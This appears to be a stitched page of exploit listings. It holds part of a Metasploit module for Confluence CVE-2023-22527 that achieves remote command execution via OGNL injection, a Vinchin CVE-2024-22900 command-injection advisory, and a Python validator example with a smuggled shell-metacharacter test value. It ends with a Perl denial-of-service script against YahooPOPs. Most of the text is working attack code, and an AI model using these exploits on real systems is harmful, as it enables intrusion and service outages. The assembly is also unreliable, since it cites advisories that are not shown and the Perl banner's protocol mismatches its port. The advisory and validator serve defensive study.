['unix', 'linux'],<br />              'Arch' => ARCH_CMD<br />            }<br />          ],<br />          [<br />            'Windows Command',<br />            {<br />              'Platform' => 'win',<br />              'Arch' => ARCH_CMD,<br />              'Payload' => { 'Space' => 8191, 'DisableNops' => true }<br />            }<br />          ]<br />        ],<br />        'DefaultTarget' => 0,<br />        'DefaultOptions' => {<br />          'RPORT' => 8090<br />        },<br />        'Notes' => {<br />          'Stability' => [CRASH_SAFE],<br />          'Reliability' => [REPEATABLE_SESSION],<br />          'SideEffects' => [IOC_IN_LOGS]<br />        }<br />      )<br />    )<br /><br />    register_options([<br />      OptString.new('TARGETURI', [true, 'Base path', '/'])<br />    ])<br />  end<br /><br />  def get_confluence_platform<br />    # this method gets the platform by exploiting CVE-2023-22527<br />    # the result is memoized so check and exploit only send one probe request<br />    return @confluence_platform if @confluence_platform<br /><br />    header = "X-#{Rex::Text.rand_text_alphanumeric(10..15)}"<br />    ognl = <<~OGNL.gsub(/^\s+/, '').tr("\n", '')<br />      @org.apache.struts2.ServletActionContext@getResponse().setHeader(<br />        '#{header}',<br />        (@java.lang.System@getProperty('os.name'))<br />      )<br />    OGNL<br />    res = inject_ognl(ognl)<br />    return nil unless res<br /><br />    @confluence_platform = res.headers[header]<br />  end<br /><br />  def check<br />    confluence_version = get_confluence_version<br />    return CheckCode::Unknown('Failed to determine the Confluence version.') unless confluence_version<br /><br />    vprint_status("Detected Confluence version: #{confluence_version}")<br />    if confluence_version > Rex::Version.new('8.5.3')<br />      return CheckCode::Safe("Version #{confluence_version} is not affected.")<br />    end<br /><br />    confluence_platform = get_confluence_platform<br />    unless confluence_platform<br />      return CheckCode::Safe('Failed to test OGNL injection.')<br />    end<br /><br />    vprint_status("Detected target platform: #{confluence_platform}")<br />    CheckCode::Vulnerable('Successfully tested OGNL injection.')<br />  end<br /><br />  def exploit<br />    confluence_platform = get_confluence_platform<br />    unless confluence_platform<br />      fail_with(Failure::NotVulnerable, 'The target is not vulnerable.')<br />    end<br /><br />    unless confluence_platform.downcase.start_with?('win') == (target['Platform'] == 'win')<br />      fail_with(Failure::NoTarget, "The target platform '#{confluence_platform}' is incompatible with '#{target.name}'")<br />    end<br /><br />    print_status("Executing #{payload_instance.refname} (#{target.name})")<br />    execute_command(payload.encoded)<br />  end<br /><br />  def execute_command(cmd, _opts = {})<br />    param = rand_text_alphanumeric(6..10)<br />    # reference a parameter in the OGNL to work around the 200 character length limit<br />    ognl = <<~OGNL.gsub(/^\s+/, '').tr("\n", '')<br />      (new freemarker.template.utility.Execute()).exec(<br />        {@org.apache.struts2.ServletActionContext@getRequest().getParameter('#{param}')}<br />      )<br />    OGNL<br /><br />    if target['Platform'] == 'win'<br />      vars_post = { param => "cmd.exe /c \"#{cmd}\"" }<br />    else<br />      # the command is executed via Runtime.exec, so sh -c "#{cmd}" will not work with all payloads<br />      # see: https://codewhitesec.blogspot.com/2015/03/sh-or-getting-shell-environment-from.html?m=1<br />      vars_post = { param => "sh -c $@|sh . echo #{cmd}" }<br />    end<br /><br />    inject_ognl(ognl, 'vars_post' => vars_post)<br />  end<br /><br />  def inject_ognl(ognl, opts = {})<br />    opts = opts.clone<br />    param = rand_text_alphanumeric(6..10)<br />    final_opts = {<br />      'method' => 'POST',<br />      'uri' => normalize_uri(target_uri.path, 'template/aui/text-inline.vm'),<br />      'vars_post' => {<br />        # label and param are both limited to a 200 character length by default<br />        'label' => "\\u0027+#request.get(\\u0027.KEY_velocity.struts2.context\\u0027).internalGet(\\u0027ognl\\u0027).findValue(#parameters.#{param},{})+\\u0027",<br />        param => ognl<br />      }.merge(opts.delete('vars_post') || {})<br />    }.merge(opts)<br /><br />    send_request_cgi(final_opts)<br />  end<br />end<br /></code></pre>
<pre><code>CVE ID: CVE-2024-22900<br /><br />Title: Command Injection Vulnerability in Vinchin Backup and Recovery Versions 7.2 and Earlier<br /><br />Description:<br />A critical security vulnerability, identified as CVE-2024-22900, has been discovered in Vinchin Backup and Recovery software, affecting versions 7.2 and earlier. The vulnerability is present in the `setNetworkCardInfo` function, which is intended to update network card information.<br /><br />Details:<br />1. The function collects the `NAME` parameter from the user request and assigns it to a variable `$name`.<br />2. The `NAME` parameter value is then used to construct a file path in the `setNetworkCardInfo` function, leading to potential command injection.<br />3. The vulnerability arises from the use of user-supplied input in system commands without proper validation and sanitization.<br /><br />Impact:<br />This vulnerability allows an attacker to inject arbitrary commands via the `NAME` parameter, potentially leading to unauthorized access or control over the affected system.<br /><br />Current Status:<br />As of the current date, there is no known patch available for this vulnerability. Users of Vinchin Backup and Recovery versions 7.2 and earlier are at risk.<br /><br />Recommendation:<br />It is strongly recommended that users of the affected software versions remain vigilant and monitor Vinchin's updates for a security patch. Upon release of a patch, users should prioritize updating their systems to mitigate this security risk.<br /><br />Signed, Valentin Lobstein<br /><br /></code></pre>
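The three Vinchin command-injection advisories on this page (CVE-2024-22903 with `file_name` in `deleteUpdateAPK`, CVE-2024-22899 with `ntphost` in `syncNtpTime`, and CVE-2024-22900 with `NAME` in `setNetworkCardInfo`) describe one defect: a request parameter concatenated, unvalidated, into a command line or path that the server then executes. As an added example, not Vinchin's code and written in Python to illustrate the PHP pattern the advisories describe, the following contrasts that shape with the fix a defender would want: a strict allow-list validator for each parameter type and an argument vector that is built from the validated value and never handed to a shell. The directory names, the `ntpdate` command line and the interface-name rule are assumptions for this example.

```python
"""Validating request parameters before they reach a system command.

Added example for the Vinchin advisories CVE-2024-22903, CVE-2024-22899 and
CVE-2024-22900; Python illustrating the PHP pattern they describe, not
Vinchin's code. Directories, command lines and the interface-name rule are
assumptions.
"""
import ipaddress
import re
import shlex

APK_DIR = "/var/lib/example/updates"          # assumed upload directory
IFCFG_DIR = "/etc/sysconfig/network-scripts"  # assumed ifcfg location

FILE_NAME_RE = re.compile(r"^[A-Za-z0-9][A-Za-z0-9._-]{0,127}\.apk$")
HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
    r"(?:\.[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?)*$"
)
IFACE_RE = re.compile(r"^[a-z][a-z0-9]{0,14}$")


class InvalidParameter(ValueError):
    """Raised when a request parameter fails validation."""


def unsafe_delete_command(file_name):
    """The vulnerable shape: the raw parameter is spliced into a shell string.

    Any shell metacharacter in file_name changes what the shell executes,
    which is the defect the advisories describe.
    """
    return f"rm -f {APK_DIR}/{file_name}"


def validate_file_name(file_name):
    """Accept a bare .apk file name only: no separators, no '..', no metacharacters."""
    if not FILE_NAME_RE.fullmatch(file_name) or ".." in file_name:
        raise InvalidParameter(f"rejected file_name {file_name!r}")
    return file_name


def validate_ntp_host(host):
    """Accept an IPv4/IPv6 literal or an RFC 1123 host name, nothing else."""
    try:
        ipaddress.ip_address(host)
        return host
    except ValueError:
        pass
    if not HOSTNAME_RE.fullmatch(host):
        raise InvalidParameter(f"rejected ntphost {host!r}")
    return host


def validate_iface_name(name):
    """Accept a short lowercase interface name such as eth0 or ens192."""
    if not IFACE_RE.fullmatch(name):
        raise InvalidParameter(f"rejected NAME {name!r}")
    return name


def safe_delete_argv(file_name):
    """Hardened shape: validated value, argv list (no shell), '--' ends option parsing."""
    return ["rm", "-f", "--", f"{APK_DIR}/{validate_file_name(file_name)}"]


def safe_ntp_sync_argv(host):
    """Argv for an NTP sync; the tool name is an assumption for this example."""
    return ["ntpdate", "-u", validate_ntp_host(host)]


def safe_ifcfg_path(name):
    """Build the ifcfg path from a validated interface name."""
    return f"{IFCFG_DIR}/ifcfg-{validate_iface_name(name)}"


def accepts(validator, value):
    """True if the validator accepts value; used by the demo below and by tests."""
    try:
        validator(value)
        return True
    except InvalidParameter:
        return False


if __name__ == "__main__":
    # Constructed inputs: one benign value and one carrying shell metacharacters.
    for value in ["update-7.2.apk", "update.apk; echo injected"]:
        print("unsafe string :", unsafe_delete_command(value))
        if accepts(validate_file_name, value):
            print("safe argv     :", shlex.join(safe_delete_argv(value)))
        else:
            print("rejected      :", repr(value))
```

The argv lists are meant for `subprocess.run(argv)` with the default `shell=False` (the PHP equivalent is passing each validated value through `escapeshellarg()` and never building the string by concatenation); `shlex.join` is used only to show what a correctly quoted command line would look like.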
<pre><code>#!/usr/bin/perl<br />use strict;<br />use warnings;<br />use IO::Socket;<br /><br />sub intro {<br />    print q{<br /><br /> ,--,<br /> _ ___/ /\|<br /> ,;'( )__, ) ~<br /> // // '--;<br /> ' \ | ^<br /> ^ ^<br /><br /> [+] YahooPOPs 1.6 - SMTP - Denial of Service (DoS)<br /><br /> [*] Coded by Fernando Mengali<br /><br /> [@] e-mail: fernando.mengalli@gmail.com<br /><br />};<br />}<br /><br />intro();<br /><br />if (!$ARGV[0]) {<br />    print "\nUsage: $0 <ip> <username> <password>\n";<br />    exit(0);<br />}<br /><br />my $host     = $ARGV[0];<br />my $username = $ARGV[1];<br />my $password = $ARGV[2];<br />my $port     = 110;<br />my $payload  = "A" x 500;<br /><br /># PeerAddr expects a hostname or dotted-quad string; the original passed the packed<br /># result of inet_aton() here, which IO::Socket::INET cannot resolve.<br />my $socket = IO::Socket::INET->new(<br />    PeerAddr => $host,<br />    PeerPort => $port,<br />    Proto    => 'tcp',<br />    Timeout  => 10<br />);<br /><br />unless ($socket) {<br />    die "[+] socket() error: $!\n";<br />}<br /><br />print "[+] YahooPOPS SMTP detected, constructing the payload\n";<br /><br />unless ($socket->send($payload)) {<br />    die "[+] Sending error, the server probably rebooted.\n";<br />}<br /></code></pre>